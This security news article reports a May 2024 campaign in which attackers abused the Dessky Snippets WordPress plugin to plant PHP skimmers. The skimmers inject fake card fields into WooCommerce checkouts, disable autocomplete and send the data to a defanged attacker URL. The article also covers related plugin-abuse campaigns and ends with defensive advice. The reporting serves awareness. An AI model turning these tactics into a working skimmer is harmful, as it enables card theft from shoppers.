Unidentified cyber adversaries are clandestinely exploiting obscure code snippet plugins for WordPress, embedding malicious PHP code within victimized websites to exfiltrate credit card information.
On May 11, 2024, Sucuri detected a campaign involving the misuse of a WordPress plugin known as Dessky Snippets, which facilitates the integration of custom PHP code. This plugin boasts over 200 active installations.
These cyber incursions frequently exploit known vulnerabilities in WordPress plugins or utilize easily deducible credentials to obtain administrative access, subsequently installing additional plugins—whether legitimate or otherwise—for further exploitation.
According to Sucuri, the Dessky Snippets plugin has been employed to implant server-side PHP skimming malware on compromised websites, thereby siphoning off financial data.
“This pernicious code was embedded in the dnsp_settings option within the WordPress wp_options table, designed to alter the WooCommerce checkout process by manipulating the billing form and injecting its own code,” security researcher Ben Martin stated.
Specifically, it introduces several new fields to the billing form, soliciting credit card details, such as names, addresses, credit card numbers, expiration dates, and Card Verification Value (CVV) numbers, which are subsequently transmitted to the URL “hxxps://2of[.]cc/wp-content/.”
A notable characteristic of this campaign is the disabling of the autocomplete attribute on the fraudulent billing form (i.e., autocomplete=”off”).
“By deactivating this feature on the fake checkout form, it diminishes the chances of the browser alerting the user about the entry of sensitive information and ensures that the fields remain blank until manually completed by the user, thereby reducing suspicion and making the fields appear as standard, necessary inputs for the transaction,” Martin elaborated.
This is not an isolated incident of threat actors leveraging legitimate code snippet plugins for nefarious purposes. Last month, the company disclosed the exploitation of the WPCode code snippet plugin to inject malicious JavaScript into WordPress sites, redirecting site visitors to VexTrio domains.
Another malware campaign, termed Sign1, has reportedly compromised over 39,000 WordPress sites in the past six months by using malicious JavaScript injections via the Simple Custom CSS and JS plugin to redirect users to fraudulent sites.
WordPress site proprietors, particularly those offering e-commerce functionalities, are advised to maintain their sites and plugins up-to-date, employ robust passwords to thwart brute-force attacks, and routinely audit their sites for signs of malware or any unauthorized modifications.